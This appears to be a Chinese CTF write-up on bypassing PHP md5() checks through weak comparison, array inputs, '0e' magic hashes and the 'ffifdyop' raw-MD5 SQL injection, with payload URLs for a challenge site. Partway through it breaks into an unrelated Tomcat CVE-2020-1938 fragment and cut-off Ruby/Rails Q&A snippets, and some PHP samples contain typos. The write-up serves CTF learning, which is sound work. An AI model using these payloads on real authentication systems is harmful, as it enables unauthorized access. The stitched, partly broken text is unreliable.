MD5()函数的作用是计算字符串的MD5散列。
返回值:如果成功则返回已计算的 MD5 散列,如果失败则返回 FALSE。
代码:
<?php
highlight_file(__FILE__);
error_reporting(0);
$flag = "flag{H3rmesk1t_is_a_loser}";
$val1 = $_GET['val1'];
$val2 = $_GET['val2'];
if (isset($_GET['val1']) and isset($_GET['val2']))
{
if ($_GET['val1'] != $_GET['val2'])
{
if ((md5($_GET['val1']) == md5($_GET['val2'])))
echo $flag;
else
echo "you can't get flag";
}
}
?>//此时如果输入 ver1[]=1&ver2[]=2,返回flag
这里比较的是PHP弱类型,需要绕过MD5()。
由于MD5不能加密数组,在加密数组的时候会返回NULL,所以我们可以传入两个数组绕过。适用于源码中没有判断变量类型或内容,如果加上了过滤函数就不能使用了。
常见的过滤函数:
ctype_alnum(string $text):bool类型
//如果text中所有的字符都是字母或者数字,则返回true,否则false
is_numeric(mixed $ver):bool类型
//如果ver是数字或者数字字符串,则返回true,否则返回false
例如:
<?php
highlight_file(_FILE_);
error_reporting(0);
$flag="flag{123456789}";
$ver1=$_GET['ver1'];
$ver2=$_GET['ver2'];
if(isset($_GET['ver1'])and isset($_GET['ver2']))
{
if($GET['ver1']!=$_GET['ver2'])
{
if((md5($_GET['ver1'])==md5($_GET['ver2'])) and is_numeric($_GET['ver1']) and is_numeric($_GET['ver2']))
echo $flag;//如果加密和ver1和ver2相等且ver1和ver2都是数字或者数字字符串,则..
else
echo "you can't get flag";
}
}
?>//此时如果输入 ver1[]=1&ver2[]=2,返回you can't get flag
原理:可以传入两个md5加密后是0e开头的字符串,但这个以0e开头的字符串只能是纯数字,这样php在进行科学计算法的时候会将它转化为0。
<?php
for($a=1;$a<=1000000000;$a++){
$md5 = md5($a);
if(preg_match('/^0e\d+$/',$md5)){//preg_match函数是进行正则表达式的匹配,成功返回1,否则返回0,前面的参数是要搜索的模式、字符串形式,后面的参数指输入的字符串。
echo $a;
echo "\n";
echo $md5;
echo "\n";
}
}
?>//加密后是0e开头的数字字符串:
QNKCDZO
240610708
314282422
s878926199a
s155964671a
s214587387a
s214587387a
例如:
<?php
highlight_file(_FILE_);
error_reporting(0);
$flag="flag{123456789}";
$ver1=$_GET['ver1'];
$ver2=$_GET['ver2'];
if(isset($_GET['ver1'])and isset($_GET['ver2']))
{
if($GET['ver1']!=$_GET['ver2'])
{
if((md5($_GET['ver1'])==md5($_GET['ver2'])) and ctype_alnum($_GET['ver1']) and ctype_alnum($_GET['ver2']))
echo $flag;//如果加密和ver1和ver2相等且ver1和ver2都是数字或者数字字符串,则..
else
echo "you can't get flag";
}
}
?>//此时如果输入 ver1=240610708&ver2=314282422,返回$flag,此时ver1和ver2加密后都是0e开头
md和md5后都是以0e开头的字符串:
CbDLytmyGm2xQyaLNhWn
770hQgrBOjrcqftrlaZk
7r4lGXCH2Ksu2JNT3BYM
代码:
<?php
highlight_file(_FILE_);
error_reporting(0);
$flag = "flag{122365944454}";
$ver1=$_GET['ver1'];
$ver2=$_GET['ver2'];
if (isset($_GET['ver1']) and isset($_GET['ver2']))
{
if ($_GET['ver1'] != $_GET['ver2']){
if(md5($_GET['ver1'])===md5($_GET['ver2']))
echo $flag;
else
echo "you can't get flag";
}
}
?>
原理同上、过程同上,可使用。
注:使用md5加密后完全相等的两个字符串绕过,不能用。
这是刚刚同上第二种方法,加密后’oe’开头的字符串,但因为强比较会比较类型和值,因此不能用这个方法来绕过。
当然可以试试加密后类型和值都完全相等的字符串。有篇博客说可以利用fastcoll_v1.0.0.5.exe来生成符合条件的字符串,还没试过,待考察。
链接:https://blog.csdn.net/LYJ20010728/article/details/116779357
起因:为了信息的安全,在数据库里存放密码的时候都是进行了加密处理的,大多数查询语句在没有进行处理的情况下应该是:
SELECT * FROM admin WHERE username = 'admin' and password = ".md5($password,true)."
原理:ffifdyop经过MD5加密后变为’or’6xxx阿巴阿巴,
而在mysql中,在用作布尔型判断时,以数字开头的字符串会被当成整型,不过由于是字符串,因此后面必须要有单引号括起来的,比如:‘xxx’or’6xxxxxx’,就相当于’xxx’or 6,就相当于 'xxx’or true,所以返回值是true。
因此查询时就变成了:
sql代码:select * from flag where user='amdin' and password=''or'6xxxx',等于 password=''or true == ture
从而实现了绕过。
题目叫easy md5,但是进去看见一个输入框,直觉跟sql有关,因此往输入框里面输入ffifdyop试试,
果然页面发生变化:
打开f12看源码,发现:
这里直接用科学计数法绕过a和b
这里我构造了一个payload,
http://03fa941a-e636-4c85-9c3d-57d574bbfee0.node4.buuoj.cn:81/levels91.php/?a=s1885207154a&b=s1836677006a
发现一直是404,
发现是自己多打了一个斜杠(博主纠结了一个小时)
于是修改payload,
http://03fa941a-e636-4c85-9c3d-57d574bbfee0.node4.buuoj.cn:81/levels91.php?a=s1885207154a&b=s1836677006a
得到页面:
终于看见希望了,flag近在咫尺!
这里看代码是php强类型比较,用数组绕过,构造payload如下图:
得到结果:
目录1.漏洞简介2、AJP13协议介绍Tomcat主要有两大功能:3.Tomcat远程文件包含漏洞分析4.漏洞复现 5、漏洞分析6.RCE实现的原理1.漏洞简介2020年2月20日,公开CNVD的漏洞公告中发现ApacheTomcat文件包含漏洞(CVE-2020-1938)。ApacheTomcat是Apache开源组织开发的用于处理HTTP服务的项目。ApacheTomcat服务器中被发现存在文件包含漏洞,攻击者可利用该漏洞读取或包含Tomcat上所有webapp目录下的任意文件。该漏洞是一个单独的文件包含漏洞,依赖于Tomcat的AJP(定向包协议)。AJP自身存在一定缺陷,导致存在可控
是否可以创建8个字符长的md5散列? 最佳答案 MD5创建16字节的哈希值。您当然可以将字符串裁剪为八个字符,如myString[0..7]一样,但请注意,这不再是有效的MD5散列。 关于ruby-我可以创建长度为8的md5哈希吗?,我们在StackOverflow上找到一个类似的问题: https://stackoverflow.com/questions/5854208/
我正在按照MicahelHartl的Rails教程构建示例应用程序。我试着探索了一下并添加了一些不同的东西——所以在用户表中我添加了一个account_balance列。问题是User模型内置了一堆验证:validates:name,presence:true,length:{maximum:50}validates:username,presence:true,length:{maximum:50}VALID_EMAIL_REGEX=/\A[\w+\-.]+@[a-z\d\-]+(?:\.[a-z\d\-]+)*\.[a-z]+\z/ivalidates:email,presence
因此,我们的页面中有以下代码:OnOff这是2个单选按钮。'开和关'。“关闭”是默认值。使用Watir-webdriver和Ruby,我们想要选择“打开”单选按钮。我们这样做:browser.radio(:id=>"HasRegistration_true").set但在这样做时,我们得到以下错误:`WebElement.clickElement':Elementcannotbescrolledintoview:[objectHTMLInputElement](Selenium::WebDriver::Error::MoveTargetOutOfBoundsError)我们知道Sele
在rails中,我有迁移来改变生产数据以适应新的验证规则,有几处错误所以我有2个不同的迁移(它们可能是一个但仍然是分开运行的两个方面)一个失败,因为另一个验证不是遇到了,反之亦然验证在模型中是新的,例如validates_uniqueness_of:job_id,:scope=>[:day,:time,:user_id,:overtime,:comments],:message=>"DuplicateEntry,Pleasecheckyourdata"validates_uniqueness_of:job_id,:scope=>[:day,:user_id,:comments],:me
使用Google+Bing并没有给出应该是一个简单问题的答案:您应该如何使用Ruby中的HMAC模块来创建带MD5的HMAC(使用secret)?HMAC文档看起来非常薄。谢谢! 最佳答案 这应该是最简单的方法:OpenSSL::HMAC.digest(OpenSSL::Digest::Digest.new('md5'),secret_key,your_data) 关于ruby-on-rails-如何在Ruby中使用HMAC模块创建MD5哈希?,我们在StackOverflow上找到一个
今天下午我在玩一个主意,偶然发现了一些我不太明白的东西。基本上我在这个实验中试图实现的是在每次创建字符串时以某种方式知道(供以后使用,例如在某种DSL中)。以下内容适用于通过String.new创建的任何字符串:class::Stringclass例如irb>String.new("foo")initializing'foo'newing'foo'=>"foo"我想不通的是当您使用文字时如何创建String对象。例如,为什么这不经过相同的初始化和设置:irb>"literalstring"=>"literalstring"我意识到当字符串是文字时,编译器会做一些不同的事情,但它不需要初
在我的Rails项目的Gemfile中,我开始有辅助gem,例如“ruby-debug19”、“perftools.rb”或“irbtools”。所有这些实际上与项目无关,而是我本地开发设置的一部分。但是因为我使用的是bundler,所以我无法加载这些gems(即使它们是在系统范围内安装的),除非我将它们添加到Gemfile中。在我看来,这有点代码味道。例如,我希望能够在railsconsole中require'irbtools'而无需将“irbtools”添加到我的Gemfile。有没有办法将辅助gem排除在Gemfile之外,并且仍然能够在我需要它们时加载它们以进行调试、分析等?
我在这里遇到了一些奇怪的事情。我有一个“身份验证器”,它依赖于ND5来散列我们作为密码匹配的特定字符串。我运行测试时出现的问题是:NoMethodError:undefinedmethod`md5'for#./models/authenticators/billing.rb:63:in`validate'./routes/login.rb:166:in`block(2levels)in'./routes/login.rb:158:in`each'./routes/login.rb:158:in`blockin'(eval):2:in`click_button'./features/st
我正在RubyonRails3.1项目中编写一个富含Javascript的应用程序,并将Handlebars用于我的JS模板框架。我正在尝试找出一种方法,将Assets的MD5摘要(在生产中的Assets预编译期间生成)动态附加到我的Handlebars模板内的标签中。我希望有一个以Assets路径为键、以MD5摘要为值的散列,但我一直找不到。一个理想的解决方案是将哈希值从Ruby传递到Javascript并定义一个Handlebars助手,它会自动将MD5摘要附加到Assets的“src”属性。有没有人尝试过做类似的事情?必须有一种方法可以在Rails中使用Javascript模板并